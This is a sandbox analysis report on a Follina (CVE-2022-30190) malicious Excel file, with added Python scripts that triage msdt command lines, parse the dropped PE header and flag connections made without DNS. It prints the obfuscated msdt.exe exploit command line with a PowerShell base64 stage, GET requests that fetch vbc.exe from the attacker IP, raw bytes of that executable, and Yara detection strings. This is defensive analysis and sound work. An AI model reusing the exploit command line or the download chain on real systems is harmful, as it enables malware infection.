Windows Analysis Report
purchase order.xlsx

Overview

General Information

Sample Name: purchase order.xlsx
Analysis ID: 653502
MD5: a8930c1fcd80e9965ae26446afb717f6
SHA1: 0cbf04bf7fc8522ab983f0246357fa70a85ee56b
SHA256: c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
Tags: VelvetSweatshop, xlsx (VelvetSweatshop is Excel's built-in default password: a workbook encrypted with it opens without prompting the user, while scanners that do not try that password see only ciphertext)

Detection

Follina CVE-2022-30190
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 1388 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • msdt.exe (PID: 6596 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'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'+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 2436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5636 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6460 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
  • cleanup
No configs have been found
Yara matches

Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x46b6:$a: PCWDiagnostic
  • 0x1cf4:$sa1: msdt.exe
  • 0x1d30:$sa1: msdt.exe
  • 0x24b4:$sa1: msdt.exe
  • 0x3c55:$sa1: msdt.exe
  • 0x1d44:$sa3: ms-msdt
  • 0x3c5f:$sa3: ms-msdt
  • 0x1e08:$sb3: IT_BrowseForFile=
  • 0x3cc1:$sb3: IT_BrowseForFile=

Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0xa2ae:$a: PCWDiagnostic
  • 0x5e78:$sa1: msdt.exe
  • 0x1908e:$sa1: msdt.exe
  • 0x22c58:$sa1: msdt.exe
  • 0x22e14:$sa1: msdt.exe
  • 0x272c0:$sb3: IT_BrowseForFile=

Source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security
        No Sigma rule has matched
        No Snort rule has matched
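The msdt.exe command line in the process tree and the SUSP_PS1_Msdt_Execution_May22 hits above come down to the same string checks, so here is a command-line triage script that applies them to process-creation telemetry. It is an added example, not part of the Joe Sandbox report and not the rule authors' code; the three command lines it runs on are constructed for the demonstration (the malicious one mirrors the shape of the invocation in the process tree, with a placeholder base64 blob instead of the real stage), and only the four rule strings that actually matched in the report ($a, $sa1, $sa3, $sb3) are used. The caveat it demonstrates: the report's Yara hits come from msdt.exe memory dumps where the proper-case string `PCWDiagnostic` is present, but the command line itself spells it `pcWdiAGNOsTIc` and mangles every other keyword, so a command-line rule that copies the strings verbatim and matches case-sensitively misses this sample.

```python
import re

# Three constructed command lines for the demonstration; none is copied from the report.
SAMPLES = {
    # Same shape as the msdt.exe invocation in the process tree: mangled case, a PowerShell
    # subexpression inside IT_BrowseForFile and a ../ traversal ending in a bogus .msi.
    # The base64 blob is a placeholder ("QUJD" = "ABC"), not the sample's stage.
    "follina": r"""C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=h$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'QUJD'+[cHAr]34+'))'))))i/../../../../../../../../../../../../.Msi""",
    # What Explorer's "Troubleshoot compatibility" context-menu entry launches on a real file:
    # it trips the broad rule but carries none of the Follina indicators.
    "benign": r'C:\Windows\system32\msdt.exe -id PCWDiagnostic -skip force -param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=C:\Tools\legacyapp.exe"',
    "unrelated": r"C:\Windows\system32\notepad.exe C:\Users\user\notes.txt",
}

# The SUSP_PS1_Msdt_Execution_May22 strings that matched in the report ($a plus one of each
# group); the rule's remaining strings are not shown there and are left out.
RULE_A = ("PCWDiagnostic",)
RULE_SA = ("msdt.exe", "ms-msdt")
RULE_SB = ("IT_BrowseForFile=",)

# Follina-specific content of the IT_BrowseForFile value, always matched case-insensitively.
FOLLINA_INDICATORS = {
    "subexpression": re.compile(r"\$\(", re.I),            # $( ... ) evaluated while msdt builds the path
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_stage": re.compile(r"frombase64string", re.I),
    "char_obfuscation": re.compile(r"\[char\]\d+", re.I),  # [CHar]58+[CHAr]58 assembles "::"
    "msi_traversal": re.compile(r"(?:\.\./){3,}[^\s\"']*\.msi", re.I),  # bogus path to pass the file check
}


def analyze_msdt_cmdline(cmdline, case_sensitive=False):
    """Broad triage (the Yara strings) plus Follina-specific confirmation on one command line."""
    def has(needles):
        return any((n in cmdline) if case_sensitive else (n.lower() in cmdline.lower())
                   for n in needles)

    rule_match = has(RULE_A) and has(RULE_SA) and has(RULE_SB)
    m = re.search(r"IT_BrowseForFile=(.*)", cmdline, re.I | re.S)
    value = m.group(1) if m else ""
    hits = [name for name, rx in FOLLINA_INDICATORS.items() if rx.search(value)]
    verdict = "follina" if hits else ("review" if rule_match else "clean")
    return {"rule_match": rule_match, "indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, analyze_msdt_cmdline(cmd))
    print("case-sensitive strings on the mangled sample:",
          analyze_msdt_cmdline(SAMPLES["follina"], case_sensitive=True))
```

The benign sample satisfies $a, $sa1 and $sb3 just like the exploit does, so the script keeps that "review" outcome apart from a "follina" verdict, which needs a PowerShell subexpression, IEX, FromBase64String or [char] concatenation inside the IT_BrowseForFile value, or the ../ traversal to a non-existent .msi. Lower-casing before comparison costs nothing and is what makes the rule strings survive the case mangling seen in this sample's command line.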

        AV Detection

        Source: purchase order.xlsx | ReversingLabs: Detection: 17%

        Exploits

        Source: Yara match | File source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

        Software Vulnerabilities

        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
        Source: global traffic | TCP traffic: 192.168.2.4:49773 -> 172.245.119.48:80 (reported twice)
        Source: excel.exe | Memory has grown: Private usage: 1MB later: 67MB
        Source: global traffic | HTTP traffic detected (request):
          GET /shipping_invc/document.html HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: 172.245.119.48
          Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected (request):
          GET /870/vbc.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
          Host: 172.245.119.48
          Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected (response to GET /870/vbc.exe):
          HTTP/1.1 200 OK
          Date: Tue, 28 Jun 2022 08:46:37 GMT
          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
          Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
          ETag: "6d600-5e278f84f0321"
          Accept-Ranges: bytes
          Content-Length: 448000
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdownload
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00 00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06 80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 c0 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 13 00 00 0a 00 00 02 28 09 00 00 06 00 7e 02 00 00 04 74 13 00 00 01 19 8d 12 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 1f 00 00 70 a2 25 18 72 31 00 00 70 a2 28 14 00 00 0a 26 02 72 51 00 00 70 02 28 02 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 06 00 00 04 02 28 05 00 00 06 6f 16 00 00 0a 00 02 7b 07 00 00 04 72 65 00 00 70 02 28 03 00 00 06 28 15 00 00 0a 6f 16 00 00 0a 00 02 7b 08 00 00 04 02 28 06 00 00 06 6f 16 00 00 0a 00 02 7b 09 00 00 04 02 28 07 00 00 06 6f 16 00 00 0a 00 02 7b 0a 00 00 04 02 28 04 00 00 06 6f 16 00 00 0a 00 2a 13 30 03 00 60 00 00 00 01 00 00 11 00 28 17 00 00 0a d0 05 00 00 01 28 18 00 00 0a 16 6f 19 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f 1a 00 00 0a 72 7d 00 00 70 28 1b 00 00 0a 0d 09 2c 0b 00 08 6f 1a 00 00 0a 13 04 2b 14 00 28 17 00 00 0a 6
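The response body above starts with `4d 5a` ("MZ"), and the bytes the report reproduces cover the whole executable header, so they can be parsed rather than eyeballed. The parser below is an added example, not code from Joe Sandbox; the byte string it embeds is the first 0x230 bytes transcribed from the Data Raw dump above, and nothing beyond the report's truncated dump is assumed. It walks the DOS header, COFF header, PE32 optional header, data directories and section table, then follows the CLR data directory to the .NET runtime header.

```python
import struct
from datetime import datetime, timezone

# First 0x230 bytes of the body returned for GET /870/vbc.exe, transcribed from the
# "Data Raw" dump in the report above (the dump is truncated; nothing beyond 0x22f is used).
VBC_EXE_HEAD = bytes.fromhex("""
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 81 4d ba 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ce 06 00
00 06 00 00 00 00 00 00 92 ec 06 00 00 20 00 00 00 00 07 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 07 00 00 02 00 00 00 00 00 00 02 00 40 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
40 ec 06 00 4f 00 00 00 00 00 07 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 20 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00
00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
b0 cc 06 00 00 20 00 00 00 ce 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 73 72 63 00 00 00 a0 03 00 00 00 00 07 00 00 04 00 00 00 d0 06 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 07 00 00 02 00 00 00 d4 06 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
74 ec 06 00 00 00 00 00 48 00 00 00 02 00 05 00 38 62 00 00 48 3f 00 00 03 00 00 00 53 00 00 06
80 a1 00 00 c0 4a 06 00 00 00 00 00 00 00 00 00
""")

MACHINES = {0x14C: "i386", 0x8664: "amd64", 0x1C0: "arm", 0xAA64: "arm64"}
DIRS = ["export", "import", "resource", "exception", "certificate", "basereloc", "debug",
        "architecture", "globalptr", "tls", "loadconfig", "boundimport", "iat",
        "delayimport", "clr", "reserved"]


def rva_to_offset(sections, rva):
    """Map an RVA that falls inside a section to its file offset."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError("RVA 0x%x is outside every section" % rva)


def parse_pe32_head(data):
    """DOS header -> COFF header -> PE32 optional header -> data directories -> sections,
    then the CLR header when the .NET data directory is populated."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here; PE32+ shifts the field layout")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs, = struct.unpack_from("<I", data, opt + 92)
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        if rva or size:
            dirs[DIRS[i]] = (rva, size)
    sections = []
    for i in range(nsect):  # section table starts right after the optional header
        base = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, base)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "chars": struct.unpack_from("<I", data, base + 36)[0]})
    info = {"machine": MACHINES.get(machine, hex(machine)), "timestamp": tstamp,
            "compiled_utc": datetime.fromtimestamp(tstamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "characteristics": chars, "entry_point": entry, "image_base": image_base,
            "subsystem": subsystem, "dll_characteristics": dll_chars,
            "directories": dirs, "sections": sections, "is_dotnet": "clr" in dirs}
    if info["is_dotnet"]:  # IMAGE_COR20_HEADER: cb, runtime version, metadata, flags, entry token, resources
        off = rva_to_offset(sections, dirs["clr"][0])
        cb, major, minor, md_rva, md_size, flags, ep_token, res_rva, res_size = \
            struct.unpack_from("<IHHIIIIII", data, off)
        info["clr"] = {"size": cb, "runtime": "%d.%d" % (major, minor), "metadata": (md_rva, md_size),
                       "flags": flags, "entry_point_token": ep_token, "resources": (res_rva, res_size)}
    return info


def managed_resource_share(info, content_length):
    """Fraction of the download occupied by the CLR resources blob (0.0 for native PEs)."""
    return info["clr"]["resources"][1] / content_length if info["is_dotnet"] else 0.0


if __name__ == "__main__":
    pe = parse_pe32_head(VBC_EXE_HEAD)
    for key in ("machine", "compiled_utc", "entry_point", "sections", "is_dotnet", "clr"):
        print(key, pe[key])
    print("managed resources: %.0f%% of the 448000-byte body" % (100 * managed_resource_share(pe, 448000)))
```

Run against the report's bytes this gives an i386 PE32 with sections .text/.rsrc/.reloc, a link timestamp of 2022-06-28 00:38:25 UTC (about two hours before the server's Last-Modified header and eight hours before this download), a populated CLR directory at RVA 0x2008, runtime header version 2.5 with flags 0x3 (ILONLY | 32BITREQUIRED), entry point token 0x06000053, and a managed resources blob of 0x64ac0 bytes, roughly 92% of the 448000-byte Content-Length. That layout, a small amount of IL in front of one large resource, is typical of .NET loaders that carry their payload as an embedded resource; the report's dump is truncated, so nothing past the header can be checked from the page itself.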
        Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.119.48 (50 occurrences)
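The finding above, connections to 172.245.119.48 with no DNS lookup for it (and, in the requests, a Host header that is a bare IP literal), is a cheap network-side detection for hard-coded staging servers. The script below is an added example, not part of the report; it joins constructed Zeek-style dns.log and conn.log records (not taken from this analysis) to list the external destinations a client reached without ever having received a DNS answer naming them, and separately flags literal-IP Host headers.

```python
import ipaddress
from collections import defaultdict

# Constructed Zeek-style records for the demonstration (not taken from the report).
# dns.log fields: ts, id.orig_h, query, answer; conn.log fields: ts, id.orig_h, id.resp_h, id.resp_p
DNS_LOG = """\
1656405990.100\t192.168.2.4\tconfig.edge.skype.com\t13.107.42.16
1656405991.200\t192.168.2.4\tclients.config.office.net\t52.109.8.19
"""
CONN_LOG = """\
1656405992.000\t192.168.2.4\t13.107.42.16\t443
1656405997.500\t192.168.2.4\t172.245.119.48\t80
1656405998.700\t192.168.2.4\t172.245.119.48\t80
1656405999.900\t192.168.2.4\t192.168.2.1\t53
1656406001.000\t192.168.2.4\t52.109.8.19\t443
"""


def resolved_by_client(dns_log):
    """client IP -> set of answer IPs it has received (the DNS side of the join)."""
    resolved = defaultdict(set)
    for line in dns_log.splitlines():
        _ts, client, _query, answer = line.split("\t")
        resolved[client].add(answer)
    return resolved


def connections_without_dns(conn_log, resolved):
    """Return {(client, dst, port): count} for external destinations a client
    connected to without any DNS answer naming that address."""
    findings = defaultdict(int)
    for line in conn_log.splitlines():
        _ts, client, dst, port = line.split("\t")
        if not ipaddress.ip_address(dst).is_global:
            continue  # LAN, loopback and link-local peers (including the resolver) need no lookup
        if dst not in resolved.get(client, set()):
            findings[(client, dst, int(port))] += 1
    return dict(findings)


def literal_ip_host(host_header):
    """True when an HTTP Host header is a bare IPv4 literal, with or without a :port suffix."""
    try:
        ipaddress.ip_address(host_header.split(":")[0])
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    hits = connections_without_dns(CONN_LOG, resolved_by_client(DNS_LOG))
    for (client, dst, port), n in hits.items():
        print(f"{client} -> {dst}:{port}  {n} connection(s), no DNS answer seen")
    print("Host: 172.245.119.48 is a literal IP:", literal_ip_host("172.245.119.48"))
```

Answers cached on the client or obtained over DoH/DoT never reach dns.log, so baseline the client population before alerting on this alone; pairing it with the literal-IP Host check and with the User-Agent seen in the requests above (an MSIE 7 / Trident string on Windows 10) narrows it to the kind of hard-coded downloader seen here.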
        Source: 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | Strings found in binary or memory (one URL per line). All of these are Microsoft Office service endpoints embedded in a file Excel wrote during the run; they are not infrastructure contacted by the exploit chain, whose only destination in the traffic above is 172.245.119.48.
          http://b.c2r.ts.cdn.office.net/pr
          http://f.c2r.ts.cdn.office.net/pr
          http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          http://weather.service.msn.com/data.aspx
          https://addinsinstallation.store.office.com/app/acquisitionlogging
          https://addinsinstallation.store.office.com/app/download
          https://addinsinstallation.store.office.com/appinstall/authenticated
          https://addinsinstallation.store.office.com/appinstall/preinstalled
          https://addinsinstallation.store.office.com/appinstall/unauthenticated
          https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          https://addinslicensing.store.office.com/apps/remove
          https://addinslicensing.store.office.com/commerce/query
          https://addinslicensing.store.office.com/entitlement/query
          https://addinslicensing.store.office.com/orgid/apps/remove
          https://addinslicensing.store.office.com/orgid/entitlement/query
          https://analysis.windows.net/powerbi/api
          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          https://api.aadrm.com
          https://api.aadrm.com/
          https://api.addins.omex.office.net/appinfo/query
          https://api.addins.omex.office.net/appstate/query
          https://api.addins.store.office.com/addinstemplate
          https://api.addins.store.office.com/app/query
          https://api.addins.store.officeppe.com/addinstemplate
          https://api.cortana.ai
          https://api.diagnostics.office.com
          https://api.diagnosticssdf.office.com
          https://api.diagnosticssdf.office.com/v2/feedback
          https://api.diagnosticssdf.office.com/v2/file
          https://api.microsoftstream.com/api/
          https://api.office.net
          https://api.onedrive.com
          https://api.powerbi.com/beta/myorg/imports
          https://api.powerbi.com/v1.0/myorg/datasets
          https://api.powerbi.com/v1.0/myorg/groups
          https://apis.live.net/v5.0/
          https://arc.msn.com/v4/api/selection
          https://asgsmsproxyapi.azurewebsites.net/
          https://augloop.office.com
          https://augloop.office.com/v2
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          https://autodiscover-s.outlook.com/
          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          https://cdn.entity.
          https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          https://client-office365-tas.msedge.net/ab
          https://clients.config.office.net/
          https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          https://clients.config.office.net/user/v1.0/android/policies
          https://clients.config.office.net/user/v1.0/ios
          https://clients.config.office.net/user/v1.0/mac
          https://clients.config.office.net/user/v1.0/tenantassociationkey
          https://cloudfiles.onenote.com/upload.aspx
          https://config.edge.skype.com
          https://config.edge.skype.com/config/v1/Office
          https://config.edge.skype.com/config/v2/Office
          https://cortana.ai
          https://cortana.ai/api
          https://cr.office.com
          https://dataservice.o365filtering.com
          https://dataservice.o365filtering.com/
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          https://dev.cortana.ai
          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          https://dev0-api.acompli.net/autodetect
          https://devnull.onenote.com
          https://directory.services.
          https://ecs.office.com/config/v2/Office
          https://edu-mathreco-prod.trafficmanager.net
          https://edu-mathsolver-prod.trafficmanager.net
          https://enrichment.osi.office.net/
          https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          https://entitlement.diagnostics.office.com
          https://entitlement.diagnosticssdf.office.com
          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          https://globaldisco.crm.dynamics.com
          https://graph.ppe.windows.net
          https://graph.ppe.windows.net/
          https://graph.windows.net
          https://graph.windows.net/
          https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
          https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
          https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
          https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          https://incidents.diagnostics.office.com
          https://incidents.diagnosticssdf.office.com
          https://inclient.store.office.com/gyro/client
